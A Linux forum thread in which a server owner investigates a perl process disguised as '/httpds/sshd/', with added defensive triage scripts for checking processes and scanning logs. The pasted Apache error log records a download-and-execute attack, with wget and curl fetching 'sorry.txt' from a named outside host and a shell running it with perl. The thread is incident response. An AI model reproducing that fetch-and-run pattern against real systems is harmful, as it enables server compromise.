LinuxQuestions.org
Old 01-09-2008, 11:24 AM   #1
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Rep: Reputation: 0
Perl eating CPU Time - what is "/httpds/sshd/"


Hi All,

For a few weeks my server has been slooooowing down sometimes, and when I log in via SSH I can see that the perl process is eating CPU time. The only solution is to kill those processes one after another (because they resurrect).

I see that this process has been started by Apache, so I'm afraid that it could be a hack attempt.

Code:
# top
13599 apache    25   0  5088 2868 1200 R 97.1  0.3  27:36.12 perl
Code:
#ps aux | grep 13599
apache   13599 52.0  0.2   5088  2868 ?        R    14:27  27:44 /httpds/sshd/
Could someone tell me what "/httpds/sshd/" is?

I use ssh and sftp instantly.
I have already disabled the apache perl module.
The OS is: Fedora Core 5 2.6.20-1.2320.fc5
Apache: 2.2.2
PHP: 5.1.6

Any help is much appreciated :-)

Best Regards,
Neo
 
Old 01-09-2008, 11:29 AM   #2
trickykid
Guru
 
Registered: Jan 2001
Posts: 24,133

Rep: Reputation: 197Reputation: 197
perl doesn't run like that unless a user most likely runs a script, etc. Sounds to me like you possibly got hacked. I'd say you may want to unplug this machine from the network to do a full investigation. Unless you have something with apache that kicks off a perl script/program, etc.
 
Old 01-09-2008, 01:54 PM   #3
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Original Poster
Rep: Reputation: 0
The problem is I cannot unplug this machine because this is a leased root server.

I saw that webmin also starts some perl processes, but they are not causing this problem, I think.

How can I find out who starts these processes and what "/httpds/sshd/" is?

I'm trying to be very careful with this server. No root access, complicated password, I regularly check the logfiles, but I didn't see anything suspect.
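
An added example, not part of the original posts, for the question of what the process really is and who started it: `top` shows the kernel's process name (`perl`) while `ps aux` prints the argument string, which a process can overwrite itself, so the two can disagree. The script below compares that string with the kernel-maintained `/proc/<pid>/exe` link and walks the parent chain; the function names and the overridable proc root are assumptions made for this example.

```sh
#!/bin/sh
# Added example: compare what a process claims to be with what the kernel
# records for it. PROCROOT is overridable so the logic can be tested offline.

# status_field KEY FILE -> value of "KEY:" in a /proc/<pid>/status file
status_field() { awk -v k="$1:" '$1 == k { print $2; exit }' "$2" 2>/dev/null; }

# triage_pid PID [PROCROOT] -> key=value lines describing the process
triage_pid() {
    pid=$1; root=${2:-/proc}; dir="$root/$pid"
    [ -r "$dir/status" ] || { echo "flags=no-such-pid"; return 0; }

    name=$(status_field Name "$dir/status")
    # exe and cwd need root (or the same uid) to read on a live system.
    exe=$(readlink "$dir/exe" 2>/dev/null) || exe=unreadable
    cwd=$(readlink "$dir/cwd" 2>/dev/null) || cwd=unreadable
    # cmdline is NUL-separated; the first field is argv[0].
    argv0=$(tr '\0' '\n' 2>/dev/null < "$dir/cmdline" | head -n 1)

    # Walk up the parent chain to see which service spawned the process.
    chain=$name; p=$(status_field PPid "$dir/status"); hops=0
    while [ "${p:-0}" -gt 0 ] && [ -r "$root/$p/status" ] && [ "$hops" -lt 16 ]; do
        chain="$chain <- $(status_field Name "$root/$p/status")"
        p=$(status_field PPid "$root/$p/status"); hops=$((hops + 1))
    done

    flags=""
    exe_base=${exe##*/}
    # A binary removed from disk after start shows up as "path (deleted)".
    case $exe in *" (deleted)") flags=exe-deleted; exe_base=${exe_base%" (deleted)"} ;; esac
    # argv[0] can be rewritten by the process; the exe link cannot. A mismatch
    # is a reason to look closer, not proof (symlinked binaries also differ).
    if [ "$exe" = unreadable ]; then
        flags=exe-unreadable
    elif [ "${argv0##*/}" != "$exe_base" ]; then
        flags="${flags:+$flags,}argv0-mismatch"
    fi

    printf 'pid=%s\nname=%s\nargv0=%s\nexe=%s\ncwd=%s\nchain=%s\nflags=%s\n' \
        "$pid" "$name" "$argv0" "$exe" "$cwd" "$chain" "${flags:-none}"
}

# Usage: sh triage.sh 13599
if [ "$#" -gt 0 ]; then triage_pid "$@"; fi
```

The `cwd` value is worth checking on the live process too, since it usually points at the directory the script was dropped into.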
 
Old 01-09-2008, 05:11 PM   #4
trickykid
Guru
 
Registered: Jan 2001
Posts: 24,133

Rep: Reputation: 197Reputation: 197
Leased root server? I'd suggest asking the people you lease it from then. But seriously, if there are processes you don't know about or how they start and you are in full control of this server, better start asking questions to your provider.

httpds/sshd sounds to me like some type of web enabled ssh program I would guess. That's why I'd suggest asking the lease provider. Most likely this server of yours could just be a virtual server and they might have programs running to monitor, applications you may not want running, etc.
 
Old 01-09-2008, 11:24 PM   #5
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Original Poster
Rep: Reputation: 0
I cannot ask my provider because this is a root server. This means I have a physical server in their server room. But this is my server; it's not virtual. So they did not install any programs there, and the only support is for hardware or the network connection.

Regards,
Neo
 
Old 01-10-2008, 01:45 AM   #6
neo_fox
LQ Newbie
 
Registered: Jan 2008
Posts: 4

Original Poster
Rep: Reputation: 0
It seems to be a hack attempt. I saw this in my general Apache error logfile:

Code:
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 13685  100 13685    0     0   2267      0  0:00:06  0:00:06 --:--:-- 35000
sh: line 1: 13589 Killed                  perl sorry.txt
--14:27:07--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

     0K .......... ...                                        100% 37.4K=0.4s

14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]

sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
--15:20:31--  http://hakkah.fateback.com/sorry.txt
Resolving hakkah.fateback.com... 216.65.1.200
Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13685 (13K) [text/plain]
Saving to: `sorry.txt'

     0K .......... ...                                        100% 34.6K=0.4s

15:20:33 (34.6 KB/s) - `sorry.txt' saved [13685/13685]

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 13685  100 13685    0     0  16702      0 --:--:-- --:--:-- --:--:-- 32962
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
Can't open perl script "sorry.txt": No such file or directory
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [error] [client 208.186.169.183] File does not exist: /var/www/sigsiu/html/ebay/zenphoto
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.
I think that it does not work. But how is it possible if the Apache perl module is disabled?
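
An added example, not part of the original post: anything a child process of Apache writes to stderr lands in the error log without Apache's `[date] [level]` prefix, which is why the wget and curl progress output and the `sh:` messages appear above; the `sh: ... perl sorry.txt` line shows a shell running the system `perl` binary as an external command, which does not involve the Apache Perl module. The script below counts such lines. Its sample log is constructed (placeholder host and client address), and the patterns cover only the tools seen in this thread.

```sh
#!/bin/sh
# Added example: find child-process output (downloaders, shell errors)
# mixed into an Apache error log.

# Constructed sample modelled on the log in the post above.
sample_log() {
    cat <<'EOF'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
100 13685  100 13685    0     0   2267      0  0:00:06  0:00:06 --:--:-- 35000
sh: line 1: 13589 Killed                  perl sorry.txt
--14:27:07--  http://files.example.invalid/sorry.txt
Saving to: `sorry.txt'
sh: fetch: command not found
Can't open perl script "sorry.txt": No such file or directory
sh: fetch: command not found
--15:20:31--  http://files.example.invalid/sorry.txt
[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.
[Thu Jan 10 02:39:32 2008] [error] [client 192.0.2.10] File does not exist: /var/www/html/zenphoto
EOF
}

# scan_error_log [FILE] -> summary lines; reads stdin when FILE is omitted
scan_error_log() {
    awk '
    /^\[/ { next }                                   # regular Apache entry
    /^--[0-9:]+--  *https?:\/\// { fetch[$2]++; n++; next }   # wget banner
    /^ *% Total +% Received/     { curl++; n++; next }        # curl progress header
    /^sh: .*: command not found/ {                   # downloader that was tried but absent
        t = $0; sub(/^sh: /, "", t); sub(/: command not found.*/, "", t)
        missing[t]++; n++; next
    }
    /^sh: line [0-9]+: +[0-9]+ Killed/ { run[$(NF-1) " " $NF]++; n++; next }
    /^Can.t open perl script/    { failed++; n++; next }
    END {
        for (u in fetch)   printf "fetch %d %s\n", fetch[u], u
        for (m in missing) printf "missing_tool %d %s\n", missing[m], m
        for (r in run)     printf "killed_child %d %s\n", run[r], r
        printf "curl_runs %d\nperl_open_failures %d\nsuspicious_lines %d\n", curl, failed, n
    }' "${1:--}"
}

sample_log | scan_error_log
```

The timestamps in the wget banners give the times to look up in the access log to find the request that triggered each download.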
 
Old 02-02-2008, 08:29 AM   #7
Promethyl
LQ Newbie
 
Registered: Feb 2008
Posts: 1

Rep: Reputation: 0
Well, I would start by renaming perl to perl2 and killing the processes. (Temporary.)

Then, put in hosts entries for the IRC servers it uses, so it can't communicate out.

It has a list of ports it scans, I would also AFP block any of those which aren't in use legitimately.

A lot of it is in Spanish, so it's unclear.

Now, I would look for how it got there in the first place. Uploaded by user? That part I'm shaky on.
 
  

